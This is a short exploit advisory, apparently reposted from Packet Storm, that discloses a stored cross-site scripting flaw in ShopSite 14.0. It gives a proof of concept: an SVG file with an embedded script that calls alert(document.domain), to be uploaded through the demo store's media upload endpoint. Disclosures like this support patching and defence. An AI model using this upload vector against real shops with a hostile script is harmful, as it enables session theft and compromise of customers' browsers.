ShopSite 14.0 Cross Site Scripting
2023-12-26 23:12:43 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

# Exploit Title: ShopSite Version: 14.0 - Stored XSS
# Date: 2023-12-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://www.shopsite.com/
# Version: 14.0
# Tested on: https://www.shopsite.com/demo.html

1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi

poc.svg

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
<script>//<![CDATA[
alert(document.domain)
//]]>
</script>
</svg>

2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg


文章来源: https://packetstormsecurity.com/files/176312/shopsite140-xss.txt
如有侵权请联系:admin#unsafe.sh